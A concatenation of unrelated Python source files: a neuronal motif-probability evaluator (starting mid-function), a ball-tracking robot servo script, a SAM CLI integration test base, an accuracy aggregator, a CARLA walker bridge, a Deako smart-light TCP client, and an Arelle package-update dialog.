nids_ABC = np.concatenate((nids_A.reshape(-1,1), nids_B.reshape(-1,1), nids_C.reshape(-1,1)), axis=1)
_, indices_AB = np.unique(nids_ABC[:, (0,1)], return_index = True, axis=0)
_, indices_AC = np.unique(nids_ABC[:, (0,2)], return_index = True, axis=0)
_, indices_BC = np.unique(nids_ABC[:, (1,2)], return_index = True, axis=0)
p_A_B_unique = p_model[indices_AB, 0]
p_B_A_unique = p_model[indices_AB, 1]
p_A_C_unique = p_model[indices_AC, 2]
p_C_A_unique = p_model[indices_AC, 3]
p_B_C_unique = p_model[indices_BC, 4]
p_C_B_unique = p_model[indices_BC, 5]
p_ABC_unique = np.concatenate((p_A_B_unique, p_B_A_unique, p_A_C_unique, p_C_A_unique, p_B_C_unique, p_C_B_unique), axis=None)
return p_ABC_unique
def calcModelProbabilitiesDependentSamples(stats, nids_A, nids_B, nids_C, dsc_ABC):
num_A = nids_A.size
num_B = nids_B.size
num_C = nids_C.size
if(num_A != num_B or num_B != num_C):
raise RuntimeError("dependent sample size mismatch")
numSamples = num_A
p_model = np.zeros(shape=(numSamples, 6))
nids_merged_unique, rev_indices = getMergedUnique(nids_A, nids_B, nids_C)
p_ABC = calcProbabilties(nids_merged_unique, nids_merged_unique, dsc_ABC)
for i in range(0, numSamples):
ia = rev_indices[i]
ib = rev_indices[i + numSamples]
ic = rev_indices[i + 2 * numSamples]
p_model[i, 0] = p_ABC[ia, ib]
p_model[i, 1] = p_ABC[ib, ia]
p_model[i, 2] = p_ABC[ia, ic]
p_model[i, 3] = p_ABC[ic, ia]
p_model[i, 4] = p_ABC[ib, ic]
p_model[i, 5] = p_ABC[ic, ib]
p_all = calcProbilityAll(nids_A, nids_B, nids_C, p_model)
stats["avg_A-B"] = np.mean(p_model[:, 0])
stats["sd_A-B"] = np.std(p_model[:, 0])
stats["avg_B-A"] = np.mean(p_model[:, 1])
stats["sd_B-A"] = np.std(p_model[:, 1])
stats["avg_A-C"] = np.mean(p_model[:, 2])
stats["sd_A-C"] = np.std(p_model[:, 2])
stats["avg_C-A"] = np.mean(p_model[:, 3])
stats["sd_C-A"] = np.std(p_model[:, 3])
stats["avg_B-C"] = np.mean(p_model[:, 4])
stats["sd_B-C"] = np.std(p_model[:, 4])
stats["avg_C-B"] = np.mean(p_model[:, 5])
stats["sd_C-B"] = np.std(p_model[:, 5])
stats["avg_all"] = np.mean(p_all)
stats["sd_all"] = np.std(p_all)
return p_model
def calcMotifProbabilities(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_A, dsc_B, dsc_C, independentSamples):
if(independentSamples):
p_model = calcModelProbabilitiesIndependentSamples(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_A, dsc_B, dsc_C)
else:
dsc_ABC = dsc_A
p_model = calcModelProbabilitiesDependentSamples(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_ABC)
p_model_inv = 1 - p_model
p_avg = np.zeros(6)
p_avg[0] = stats["avg_A-B"]
p_avg[1] = stats["avg_B-A"]
p_avg[2] = stats["avg_A-C"]
p_avg[3] = stats["avg_C-A"]
p_avg[4] = stats["avg_B-C"]
p_avg[5] = stats["avg_C-B"]
p_avg = p_avg.reshape((-1,6))
p_avg_inv = 1 - p_avg
masks, masks_inv = getMotifMasks(3)
stats["motif_probabilities_64_random"] = {}
stats["motif_probabilities_64_model"] = {}
for i in range(0, masks.shape[0]):
mask = masks[i,:]
mask_inv = masks_inv[i,:]
p_motif_random = calcMotifProbability(p_avg, p_avg_inv, mask, mask_inv)
p_motif_model = calcMotifProbability(p_model, p_model_inv, mask, mask_inv)
motifKey = tuple(mask.astype(int))
stats["motif_probabilities_64_random"][motifKey] = p_motif_random
stats["motif_probabilities_64_model"][motifKey] = p_motif_model
def getMergedUnique(nidsA, nidsB, nidsC):
merged = np.concatenate((nidsA, nidsB, nidsC))
mergedUnique, reverseIndices = np.unique(merged, return_inverse=True)
return mergedUnique, reverseIndices
def calcEdgeProbabilitiesBatch(batchIndex, results, combinations, idsFolder, independentSamples, mode, networkDir, outfolder):
k = 0
dscCache = {}
for combination in combinations:
k += 1
if(k % 10 == 0):
dscCache = {}
dscFolder = "DSC_50-50-50_all"
ignoreIdPostfix = False
if("h01" in mode):
ignoreIdPostfix = True
if("#null-model" in combination[0]):
dscFolder = "DSC_null-model"
else:
dscFolder = "DSC_empirical"
if(mode == "online-experiment"):
combinationKey = combination
A = "sel-A"
B = "sel-B"
C = "sel-C"
else:
A = combination[0]
B = combination[1]
C = combination[2]
combinationKey = (A, B, C)
try:
if(independentSamples):
if(mode == "online-experiment"):
nids_A_sample = idsFolder["A"]
nids_B_sample = idsFolder["B"]
nids_C_sample = idsFolder["C"]
loadDSCOnlineExperiment(networkDir, nids_A_sample, dscCache, dscFolder)
loadDSCOnlineExperiment(networkDir, nids_B_sample, dscCache, dscFolder)
loadDSCOnlineExperiment(networkDir, nids_C_sample, dscCache, dscFolder)
dsc_A = dscCache
dsc_B = dscCache
dsc_C = dscCache
else:
_, nids_A_sample = loadIds(idsFolder, A, ignoreIdPostfix)
_, nids_B_sample = loadIds(idsFolder, B, ignoreIdPostfix)
_, nids_C_sample = loadIds(idsFolder, C, ignoreIdPostfix)
dsc_A = loadDSC(networkDir, nids_A_sample, dscCache, A, dscFolder)
dsc_B = loadDSC(networkDir, nids_B_sample, dscCache, B, dscFolder)
dsc_C = loadDSC(networkDir, nids_C_sample, dscCache, C, dscFolder)
else:
nids_A_sample, nids_B_sample, nids_C_sample = loadDependentIds(idsFolder, A, B, C)
nids_merged_unique, _ = getMergedUnique(nids_A_sample, nids_B_sample, nids_C_sample)
print("nids_merged_unique", nids_merged_unique.shape)
dsc_A = loadDSC(networkDir, nids_merged_unique, dscCache, A, dscFolder)
dsc_B = None
dsc_C = None
stats = {}
calcMotifProbabilities(stats, nids_A_sample, nids_B_sample, nids_C_sample, dsc_A, dsc_B, dsc_C, independentSamples)
stats["motif_probabilities_16_random"] = aggregateProbabilties_16(stats["motif_probabilities_64_random"])
stats["motif_probabilities_16_model"] = aggregateProbabilties_16(stats["motif_probabilities_64_model"])
results[combinationKey] = stats
print("batch {}: processed {}/{}".format(batchIndex, k, len(combinations)))
except Exception as e:
results[combinationKey] = None
print(traceback.format_exc())
if(outfolder):
errorFile = os.path.join(outfolder, "error_{}-{}-{}.txt".format(A, B, C))
with open(errorFile, "w+") as f:
f.write(traceback.format_exc())
print("batch {}: failed {}/{}".format(batchIndex, k, len(combinations)))
def writeMotifFeatures(filename, results, combinations):
with open(filename, "w+") as f:
f.write("A,B,C,avg_A-B,sd_A-B,avg_B-A,sd_B-A,avg_A-C,sd_A-C,avg_C-A,sd_C-A,avg_B-C,sd_B-C,avg_B-C,sd_B-C,avg_all,sd_all\n")
for combination in combinations:
stats = results[combination]
if(stats is None):
continue
f.write("{},{},{},".format(combination[0], combination[1], combination[2]))
f.write("{:.12E},{:.12E},".format(stats["avg_A-B"], stats["sd_A-B"]))
f.write("{:.12E},{:.12E},".format(stats["avg_B-A"], stats["sd_B-A"]))
f.write("{:.12E},{:.12E},".format(stats["avg_A-C"], stats["sd_A-C"]))
f.write("{:.12E},{:.12E},".format(stats["avg_C-A"], stats["sd_C-A"]))
f.write("{:.12E},{:.12E},".format(stats["avg_B-C"], stats["sd_B-C"]))
f.write("{:.12E},{:.12E},".format(stats["avg_C-B"], stats["sd_C-B"]))
f.write("{:.12E},{:.12E}\n".format(stats["avg_all"], stats["sd_all"]))
def writeMotifProbabilities(outfolder, results, combinations):
masks, masks_inv = getMotifMasks(3)
for combination in combinations:
if(results[combination] is None):
continue
probabilities_random = results[combination]["motif_probabilities_64_random"]
probabilities_model = results[combination]["motif_probabilities_64_model"]
filename = os.path.join(outfolder,"probabilities_64_{}-{}-{}.csv".format(combination[0], combination[1], combination[2]))
with open(filename, "w+") as f:
f.write("A-B,B-A,A-C,C-A,B-C,C-B,probability_random,probability_model\n")
for i in range(0,masks.shape[0]):
mask = masks[i,:]
motifKey = tuple(mask.astype(int))
p_random = probabilities_random[motifKey]
p_model = probabilities_model[motifKey]
f.write("{},{},{},{},{},{},".format(motifKey[0], motifKey[1], motifKey[2], motifKey[3], motifKey[4], motifKey[5]))
f.write("{:.12E},{:.12E}\n".format(p_random, p_model))
def writeSummary(filename, results, combinations):
with open(filename, "w+") as f:
f.write("A,B,C")
for k in range(1,17):
f.write(",motif-{}_random".format(k))
f.write(",motif-{}_model".format(k))
f.write("\n")
for combination in combinations:
if(results[combination] is None):
continue
f.write("{},{},{}".format(combination[0], combination[1], combination[2]))
probabilities_random = results[combination]["motif_probabilities_16_random"]
probabilities_model = results[combination]["motif_probabilities_16_model"]
for k in range(1,17):
f.write(",{:.12E}".format(probabilities_random[k]))
f.write(",{:.12E}".format(probabilities_model[k]))
f.write("\n")
def calcDeviation(p_random, p_model, maxDeviation = 1000000000000):
if(p_random > 0):
deviation = p_model / p_random
return min(deviation, maxDeviation)
elif(p_model == 0):
return 1
else:
return maxDeviation
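# Example of the deviation measure above: p_random = 0.002 and p_model = 0.005
# give a deviation of 2.5 (the motif is 2.5x over-represented relative to the
# random model); p_random = 0 with p_model > 0 is capped at maxDeviation, and
# p_random = 0 with p_model = 0 is reported as 1 (no deviation).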
def convertSummaryFileJson(filename):
if(".csv" not in filename):
raise ValueError(filename)
outfile = filename.replace(".csv", ".json")
summary = []
with open(filename) as f:
lines = f.readlines()
for i in range(1, len(lines)):
parts = lines[i].rstrip().split(",")
selection = "_".join([parts[0], parts[1], parts[2]])
for k in range(0,16):
p_random = float(parts[k * 2 + 3])
p_model = float(parts[k * 2 + 4])
deviation = calcDeviation(p_random, p_model)
summary.append({
"selection" : selection,
"motif-number" : k + 1,
"prob-random" : round(p_random,8),
"prob-model" : round(p_model,8),
"prob-deviation" : round(deviation,8)
})
with open(outfile, "w+") as f:
json.dump(summary, f)
def getRuleBatchCombinations(networkDir, mode):
dscBaseFolder = os.path.join(networkDir, "DSC_{}".format(mode))
parameterDescriptors = util.getParameterDescriptorsFromFolder(dscBaseFolder)
combinations = []
for parameterDescriptor in parameterDescriptors:
combinations.append((parameterDescriptor, parameterDescriptor, parameterDescriptor))
return combinations
def calcCombinations(networkDir, idsFolder, mode, outfolder, numWorkers):
independentSamples = True
if(mode == "celltype-combinations"):
combinations = motif_combinations.getCellTypeCombinations()
elif(mode == "celltype-layer-combinations"):
combinations = motif_combinations.getCellTypeLayerCombinations()
elif(mode == "all-column-combinations"):
combinations = motif_combinations.getAllColumnCombinations()
elif(mode == "selected-column-combinations"):
combinations = motif_combinations.getSelectedColumnCombinations()
elif(mode == "intersomatic-distance-combinations"):
combinations = motif_combinations.getIntersomaticDistanceCombinations()
independentSamples = False
elif(mode == "h01-layer-combinations"):
combinations = motif_combinations.getH01LayerCombinations()
elif(mode == "h01-pyramidal-combinations"):
combinations = motif_combinations.getH01PyramidalCombinations()
else:
raise ValueError(mode)
batches = np.array_split(combinations, numWorkers)
manager = mp.Manager()
results = manager.dict()
processes = []
for i in range(0, len(batches)):
p = mp.Process(target=calcEdgeProbabilitiesBatch, args=(i, results, batches[i], idsFolder, independentSamples, mode, networkDir, outfolder))
p.start()
processes.append(p)
for p in processes:
p.join()
filename = os.path.join(outfolder, "features_{}.csv".format(mode))
writeMotifFeatures(filename, results, combinations)
writeMotifProbabilities(outfolder, results, combinations)
filename = os.path.join(outfolder, "probabilities_16_{}.csv".format(mode))
writeSummary(filename, results, combinations)
convertSummaryFileJson(filename)
def printUsageAndExit():
print("eval_motifs.py network-dir mode num-workers [sample-ids]")
print()
print("mode: celltype-combinations, celltype-layer-combinations, all-column-combinations, selected-column-cobinations, intersomatic-distance-combinations")
print(" h01-layer-combinations, h01-pyramidal-combinations")
exit()
if __name__ == "__main__":
if(len(sys.argv) not in [4,5]):
printUsageAndExit()
networkDir = sys.argv[1]
mode = sys.argv[2]
numWorkers = int(sys.argv[3])
resampleIds = False
if(len(sys.argv) == 5):
if(sys.argv[4] not in ["sample-ids"]):
printUsageAndExit()
resampleIds = True
util.makeDir(os.path.join(networkDir, "eval", "motifs"))
idsFolder = os.path.join(networkDir, "eval", "motifs", "samples_{}".format(mode))
if(resampleIds):
util.makeCleanDir(idsFolder)
if(mode == "celltype-combinations"):
sampleSize = 200
elif(mode == "celltype-layer-combinations"):
sampleSize = 200
elif(mode == "all-column-combinations"):
sampleSize = 200
elif(mode == "selected-column-combinations"):
sampleSize = 200
elif(mode == "intersomatic-distance-combinations"):
sampleSize = 300
elif("h01" in mode):
raise ValueError(mode)
else:
raise ValueError(mode)
combinationsDir = os.path.join(networkDir, "eval", "motifs", mode)
util.makeCleanDir(combinationsDir)
if(resampleIds):
sampleIds(networkDir, idsFolder, mode, sampleSize, numWorkers)
calcCombinations(networkDir, idsFolder, mode, combinationsDir, numWorkers) |
11.robot_servo_ball.py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
* @par Copyright (C): 2010-2020, Hunan CLB Tech
* @file robot_servo_ball
* @version V1.0
* @details
* @par History
@author: zhulin
"""
from __future__ import division
import cv2
import time
import numpy as np
from LOBOROBOT import LOBOROBOT,PCA9685 # load the robot library
import threading
import sys
reload(sys)
sys.setdefaultencoding('utf8')
# instantiate the robot object
clbrobot = PCA9685(0x40, debug=False) # instantiate the robot object
clbrobot.setPWMFreq(50)
# set initial servo positions; adjust them to your own requirements
clbrobot.setPWM(10,0,350) # base (pan) servo
clbrobot.setPWM(9,0,370) # tilt servo
time.sleep(1)
# initialize the camera and set the thresholds
usb_cap = cv2.VideoCapture(0)
# HSV lower/upper bounds for tracking the ball
ball_yellow_lower=np.array([9,135,231])
ball_yellow_upper=np.array([31,255,255])
# set the display resolution to 320x240 px
usb_cap.set(3, 320)
usb_cap.set(4, 240)
# each degree of freedom of the servo gimbal needs four variables
pid_thisError_x=500 #current error
pid_lastError_x=100 #previous error
pid_thisError_y=500
pid_lastError_y=100
pid_x=0
pid_y=0
# servo rotation angles
pid_Y_P = 280
pid_X_P = 300 #rotation angle
pid_flag=0
# rotate the robot's pan/tilt servos
def Robot_servo(X_P,Y_P):
clbrobot.setPWM(10,0,650-X_P)
clbrobot.setPWM(9,0,650-Y_P)
# main loop
while True:
ret,frame = usb_cap.read()
# Gaussian blur
frame=cv2.GaussianBlur(frame,(5,5),0)
hsv= cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
# mask the frame and use morphology to isolate the ball
mask=cv2.inRange(hsv,ball_yellow_lower,ball_yellow_upper) # threshold mask
mask=cv2.erode(mask,None,iterations=2)
mask=cv2.dilate(mask,None,iterations=2)
mask=cv2.GaussianBlur(mask,(3,3),0)
res=cv2.bitwise_and(frame,frame,mask=mask)
cnts=cv2.findContours(mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2] # find the ball contours
# process the ball once it is found
if len(cnts)>0:
cap_cnt=max(cnts,key=cv2.contourArea)
(pid_x,pid_y),radius=cv2.minEnclosingCircle(cap_cnt)
cv2.circle(frame,(int(pid_x),int(pid_y)),int(radius),(255,0,255),2)
# compute the error values
pid_thisError_x=pid_x-160
pid_thisError_y=pid_y-120
# PID control parameters
pwm_x = pid_thisError_x*3+1*(pid_thisError_x-pid_lastError_x)
pwm_y = pid_thisError_y*3+1*(pid_thisError_y-pid_lastError_y)
# carry the errors over to the next iteration
pid_lastError_x = pid_thisError_x
pid_lastError_y = pid_thisError_y
pid_XP=pwm_x/100
pid_YP=pwm_y/100
# pid_X_P and pid_Y_P are the final PID outputs
pid_X_P=pid_X_P-int(pid_XP)
pid_Y_P=pid_Y_P-int(pid_YP)
# clamp the servo values to their allowed range
if pid_X_P>670:
pid_X_P=650
if pid_X_P<0:
pid_X_P=0
if pid_Y_P>650:
pid_Y_P=650
if pid_Y_P<0:
pid_Y_P=0
servo_tid=threading.Thread(target=Robot_servo,args=(pid_X_P,pid_Y_P)) # run the servo update in a separate thread
servo_tid.setDaemon(True)
servo_tid.start() # start the thread
cv2.imshow("MAKEROBO Robot", frame) # show the frame
if cv2.waitKey(1)==119:
break
usb_cap.release()
cv2.destroyAllWindows()
|
start_api_integ_base.py | import shutil
import uuid
from typing import List, Optional, Dict
from unittest import TestCase, skipIf
import threading
from subprocess import Popen, PIPE
import time
import os
import random
from pathlib import Path
import docker
from tests.testing_utils import SKIP_DOCKER_MESSAGE, SKIP_DOCKER_TESTS, run_command
@skipIf(SKIP_DOCKER_TESTS, SKIP_DOCKER_MESSAGE)
class StartApiIntegBaseClass(TestCase):
template: Optional[str] = None
container_mode: Optional[str] = None
parameter_overrides: Optional[Dict[str, str]] = None
binary_data_file: Optional[str] = None
integration_dir = str(Path(__file__).resolve().parents[2])
invoke_image: Optional[List] = None
build_before_invoke = False
build_overrides: Optional[Dict[str, str]] = None
@classmethod
def setUpClass(cls):
# This is the directory for tests/integration which will be used to file the testdata
# files for integ tests
cls.template = cls.integration_dir + cls.template_path
if cls.binary_data_file:
cls.binary_data_file = os.path.join(cls.integration_dir, cls.binary_data_file)
if cls.build_before_invoke:
cls.build()
cls.port = str(StartApiIntegBaseClass.random_port())
cls.docker_client = docker.from_env()
for container in cls.docker_client.api.containers():
cls.docker_client.api.remove_container(container, force=True)
cls.thread = threading.Thread(target=cls.start_api())
cls.thread.setDaemon(True)
cls.thread.start()
@classmethod
def build(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "build"]
if cls.build_overrides:
overrides_arg = " ".join(
["ParameterKey={},ParameterValue={}".format(key, value) for key, value in cls.build_overrides.items()]
)
command_list += ["--parameter-overrides", overrides_arg]
working_dir = str(Path(cls.template).resolve().parents[0])
run_command(command_list, cwd=working_dir)
@classmethod
def start_api(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
command_list = [command, "local", "start-api", "-t", cls.template, "-p", cls.port]
if cls.container_mode:
command_list += ["--warm-containers", cls.container_mode]
if cls.parameter_overrides:
command_list += ["--parameter-overrides", cls._make_parameter_override_arg(cls.parameter_overrides)]
if cls.invoke_image:
for image in cls.invoke_image:
command_list += ["--invoke-image", image]
cls.start_api_process = Popen(command_list, stderr=PIPE)
while True:
line = cls.start_api_process.stderr.readline()
if "(Press CTRL+C to quit)" in str(line):
break
cls.stop_reading_thread = False
def read_sub_process_stderr():
while not cls.stop_reading_thread:
cls.start_api_process.stderr.readline()
cls.read_threading = threading.Thread(target=read_sub_process_stderr)
cls.read_threading.start()
@classmethod
def _make_parameter_override_arg(self, overrides):
return " ".join(["ParameterKey={},ParameterValue={}".format(key, value) for key, value in overrides.items()])
@classmethod
def tearDownClass(cls):
# After all the tests run, we need to kill the start-api process.
cls.start_api_process.kill()
cls.stop_reading_thread = True
@staticmethod
def random_port():
return random.randint(30000, 40000)
@staticmethod
def get_binary_data(filename):
if not filename:
return None
with open(filename, "rb") as fp:
return fp.read()
class WatchWarmContainersIntegBaseClass(StartApiIntegBaseClass):
temp_path: Optional[str] = None
template_path: Optional[str] = None
code_path: Optional[str] = None
docker_file_path: Optional[str] = None
@classmethod
def setUpClass(cls):
cls.temp_path = str(uuid.uuid4()).replace("-", "")[:10]
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir)
os.mkdir(working_dir)
os.mkdir(Path(cls.integration_dir).resolve().joinpath(cls.temp_path).joinpath("dir"))
cls.template_path = f"/{cls.temp_path}/template.yaml"
cls.code_path = f"/{cls.temp_path}/main.py"
cls.code_path2 = f"/{cls.temp_path}/dir/main2.py"
cls.docker_file_path = f"/{cls.temp_path}/Dockerfile"
cls.docker_file_path2 = f"/{cls.temp_path}/Dockerfile2"
if cls.template_content:
cls._write_file_content(cls.template_path, cls.template_content)
if cls.code_content:
cls._write_file_content(cls.code_path, cls.code_content)
if cls.docker_file_content:
cls._write_file_content(cls.docker_file_path, cls.docker_file_content)
super().setUpClass()
@classmethod
def _write_file_content(cls, path, content):
with open(cls.integration_dir + path, "w") as f:
f.write(content)
@classmethod
def tearDownClass(cls):
working_dir = str(Path(cls.integration_dir).resolve().joinpath(cls.temp_path))
if Path(working_dir).resolve().exists():
shutil.rmtree(working_dir)
super().tearDownClass()
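# Illustrative sketch (an assumption about how this base class is consumed,
# not code from the original file): concrete test classes point template_path
# at a testdata template and then exercise the locally started API, e.g.
#
#     class MyStartApiTest(StartApiIntegBaseClass):
#         template_path = "/testdata/start_api/template.yaml"   # hypothetical path
#
#         def test_root(self):
#             import requests
#             response = requests.get("http://127.0.0.1:{}/".format(self.port))
#             self.assertEqual(response.status_code, 200)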
|
aggregate_accuracy.py | #!/usr/bin/env python
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Report all 'stats/accuracy.json' into a json file on stdout.
All the accuracies are summarized.
"""
import json
import sys
import threading
import tensorflow as tf
import tqdm
from absl import app
from absl import flags
FLAGS = flags.FLAGS
N_THREADS = 100
def add_contents_to_dict(filename: str, target):
with tf.gfile.Open(filename, 'r') as f:
target[filename] = json.load(f)
def main(argv):
files = []
for path in argv[1:]:
files.extend(tf.io.gfile.glob(path))
assert files, 'No files found'
print('Found %d files.' % len(files), file=sys.stderr)
summary = {}
threads = []
for x in tqdm.tqdm(files, leave=False, desc='Collating'):
t = threading.Thread(
target=add_contents_to_dict, kwargs=dict(filename=x, target=summary))
threads.append(t)
t.start()
while len(threads) >= N_THREADS:
dead = [p for p, t in enumerate(threads) if not t.is_alive()]
while dead:
p = dead.pop()
del threads[p]
if x == files[-1]:
for t in threads:
t.join()
assert len(summary) == len(files)
print(json.dumps(summary, sort_keys=True, indent=4))
if __name__ == '__main__':
app.run(main)
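# Example invocation (the glob pattern is illustrative, not from this repo):
#
#     python aggregate_accuracy.py 'gs://my-bucket/experiments/*/stats/accuracy.json' > accuracies.json
#
# Each matching file is loaded on its own thread (throttled to roughly
# N_THREADS concurrent readers) and the result is printed to stdout as a
# single JSON object keyed by file path.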
|
walker.py | #!/usr/bin/env python
#
# Copyright (c) 2018-2019 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Classes to handle Carla pedestrians
"""
#import rospy
from derived_object_msgs.msg import Object
import threading
from threading import Thread, Lock, Event
from traffic_participant import TrafficParticipant
from carla_msgs.msg import CarlaWalkerControl
from carla import WalkerControl
from icvSubscriber import Subscriber
class Walker(TrafficParticipant):
"""
Actor implementation details for pedestrians
"""
def __init__(self, carla_actor, parent, communication, prefix=None):
"""
Constructor
:param carla_actor: carla walker actor object
:type carla_actor: carla.Walker
:param parent: the parent of this
:type parent: carla_icv_bridge.Parent
:param communication: communication-handle
:type communication: carla_icv_bridge.communication
:param prefix: the topic prefix to be used for this actor
:type prefix: string
"""
if not prefix:
prefix = "walker/{:03}".format(carla_actor.id)
super(Walker, self).__init__(carla_actor=carla_actor,
parent=parent,
communication=communication,
prefix=prefix)
self.control_subscriber = CarlaWalkerControl()
self.sub1=Subscriber(self.get_topic_prefix() + "/walker_control_cmd")
self.Sec_loop=0.02
self.update_command_thread = Thread(target=self._update_commands_thread)
self.update_command_thread.start()
def update(self, frame, timestamp):
super(Walker, self).update(frame, timestamp)
def control_command_updated(self):
"""
Receive a CarlaWalkerControl msg and send to CARLA
This function gets called whenever a icv message is received via
'/carla/<role name>/walker_control_cmd' topic.
The received icv message is converted into carla.WalkerControl command and
sent to CARLA.
:param icv_walker_control: current walker control input received via icv
:type self.info.output: carla_icv_bridge.msg.CarlaWalkerControl
:return:
"""
self.sub1.subscribe( self.control_subscriber)
walker_control = WalkerControl()
walker_control.direction.x = self.control_subscriber.direction.x
walker_control.direction.y = -self.control_subscriber.direction.y
walker_control.direction.z = self.control_subscriber.direction.z
walker_control.speed = self.control_subscriber.speed
walker_control.jump = self.control_subscriber.jump
self.carla_actor.apply_control(walker_control)
def _update_commands_thread(self):
if self.sub1.getstate():
self.sub1.reset()
self.control_command_updated()
def get_classification(self):
"""
Function (override) to get classification
:return:
"""
return Object.CLASSIFICATION_PEDESTRIAN
|
deako.py | from threading import Timer
import socket
import select
import threading
import json
import asyncio
device_list_dict = {
"transactionId": "015c44d3-abec-4be0-bb0d-34adb4b81559",
"type": "DEVICE_LIST",
"dst": "deako",
"src": "ACME Corp"
}
state_change_dict = {
"transactionId": "015c44d3-abec-4be0-bb0d-34adb4b81559",
"type": "CONTROL",
"dst": "deako",
"src": "ACME Corp",
}
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
def _run(self):
self.is_running = False
self.start()
self.function(*self.args)
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
if self.is_running:
self._timer.cancel()
self.is_running = False
class Deako:
def __init__(self, ip, what):
self.ip = ip
self.src = what
self.s = None
self.devices = {}
self.expected_devices = 0
self.rt = RepeatedTimer(2, self._internal_connect, self)
def update_state(self, uuid, power, dim=None):
if uuid is None:
return
if uuid not in self.devices:
return
self.devices[uuid]["state"]["power"] = power
self.devices[uuid]["state"]["dim"] = dim
if "callback" not in self.devices[uuid]:
return
self.devices[uuid]["callback"]()
def set_state_callback(self, uuid, callback):
if uuid not in self.devices:
return
self.devices[uuid]["callback"] = callback
def record_device(self, name, uuid, power, dim=None):
if uuid is None:
return
if uuid not in self.devices:
self.devices[uuid] = {}
self.devices[uuid]["state"] = {}
self.devices[uuid]["name"] = name
self.devices[uuid]["uuid"] = uuid
self.devices[uuid]["state"]["power"] = power
self.devices[uuid]["state"]["dim"] = dim
def incoming_json(self, in_data):
if in_data["type"] == "DEVICE_LIST":
subdata = in_data["data"]
self.expected_devices = subdata["number_of_devices"]
elif in_data["type"] == "DEVICE_FOUND":
subdata = in_data["data"]
state = subdata["state"]
if "dim" in state:
self.record_device(
subdata["name"], subdata["uuid"], state["power"], state["dim"])
else:
self.record_device(
subdata["name"], subdata["uuid"], state["power"])
elif in_data["type"] == "EVENT":
subdata = in_data["data"]
state = subdata["state"]
if "dim" in state:
self.update_state(subdata["target"],
state["power"], state["dim"])
else:
self.update_state(subdata["target"], state["power"])
else:
print(json.dumps(in_data))
def read_func(self, s):
leftovers = ""
while 1:
socket_list = [s]
# Get the list sockets which are readable
read_sockets, write_sockets, error_sockets = select.select(
socket_list, [], [])
for sock in read_sockets:
# incoming message from remote server
if sock == s:
try:
data = sock.recv(1024)
if not data:
self.rt.start()
return
else:
raw_string = data.decode("utf-8")
list_of_items = raw_string.split("\r\n")
for item in list_of_items:
if len(item) == 0:
continue
try:
self.incoming_json(
json.loads(item))
continue
except json.decoder.JSONDecodeError:
leftovers = leftovers + item
if len(leftovers) != 0:
try:
self.incoming_json(
json.loads(leftovers))
leftovers = ""
except json.decoder.JSONDecodeError:
self.errors = 0
except:
self.rt.start()
return
def _internal_connect(self, this):
this.rt.stop()
try:
this.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
this.s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
this.s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)
this.s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 3)
this.s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 3)
this.s.settimeout(2)
this.s.connect((this.ip, 23))
x = threading.Thread(target=this.read_func, args=(this.s,))
x.start()
except:
this.rt.start()
def connect(self):
self._internal_connect(self)
def send_data(self, data_to_send):
if self.s is None:
return
try:
self.s.send(str.encode(data_to_send))
except:
self.s.close()
self.rt.start()
def get_devices(self):
return self.devices
async def find_devices(self, timeout = 10):
device_list_dict["src"] = self.src
self.send_data(json.dumps(device_list_dict))
remaining = timeout
while((self.expected_devices == 0 or len(self.devices) != self.expected_devices) and remaining > 0):
await asyncio.sleep(1)
remaining -= 1
def send_device_control(self, uuid, power, dim=None):
state_change = {
"target": uuid,
"state": {
"power": power,
"dim": dim
}
}
state_change_dict["data"] = state_change
state_change_dict["src"] = self.src
self.send_data(json.dumps(state_change_dict))
def get_name_for_device(self, uuid):
return self.devices[uuid]["name"]
def get_state_for_device(self, uuid):
return self.devices[uuid]["state"]
|
DialogPackageManager.py | '''
Created on Oct 6, 2013 (from DialogPluginManager.py)
@author: Mark V Systems Limited
(c) Copyright 2013 Mark V Systems Limited, All rights reserved.
'''
from tkinter import simpledialog, Toplevel, font, messagebox, VERTICAL, HORIZONTAL, N, S, E, W
from tkinter.constants import DISABLED, ACTIVE
try:
from tkinter.ttk import Treeview, Scrollbar, Frame, Label, Button
except ImportError:
from ttk import Treeview, Scrollbar, Frame, Label, Button
from arelle import PackageManager, DialogURL
from arelle.CntlrWinTooltip import ToolTip
import os, time
try:
import regex as re
except ImportError:
import re
def dialogPackageManager(mainWin):
# check for updates in background
import threading
thread = threading.Thread(target=lambda cntlr=mainWin: backgroundCheckForUpdates(cntlr))
thread.daemon = True
thread.start()
def backgroundCheckForUpdates(cntlr):
cntlr.showStatus(_("Checking for updates to packages")) # clear web loading status
packageNamesWithNewerFileDates = PackageManager.packageNamesWithNewerFileDates()
if packageNamesWithNewerFileDates:
cntlr.showStatus(_("Updates are available for these packages: {0}")
.format(', '.join(packageNamesWithNewerFileDates)), clearAfter=5000)
else:
cntlr.showStatus(_("No updates found for packages."), clearAfter=5000)
